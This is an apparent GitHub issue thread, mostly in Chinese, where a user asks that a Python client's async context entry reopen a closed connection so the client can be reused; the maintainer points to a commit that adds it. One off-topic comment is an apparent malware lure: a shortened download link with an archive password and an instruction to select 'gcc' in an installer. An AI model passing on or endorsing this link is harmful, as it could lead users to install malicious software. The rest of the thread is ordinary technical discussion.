### ISSUE TITLE
希望有可以简单复用的Client

### ISSUE THREAD

**Issue by adk23333** [Starry-OvO/Tieba-Cloud-Review#224]
**给__aenter__方法增加检查连接是否已打开的功能，如没有则使用先前的账户信息重新init一次**

以便简单的支持以下用法：
```
async with Client(...) as client:
    app.client = client

...app context...

async with app.client:
    pass
```

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by lumina37** [comment]
感觉是个很有用的方法，话说还有哪些库也应用了这个设计我去参考参考

**Comment by adk23333** [comment]
> 话说还有哪些库也应用了这个设计我去参考参考

忘了在哪看的了，我自己项目弄的配置文件类参考着用了这个方式😂

**Comment by lumina37** [comment]
bda80261441d704495bddeca9beac914b5b7e84d 应该能用了

**Comment by adk23333** [comment]
晚点会体验一下，有问题再说

**Comment by adk23333** [comment]
> bda80261441d704495bddeca9beac914b5b7e84d 应该能用了

晚点会体验一下，有问题再说
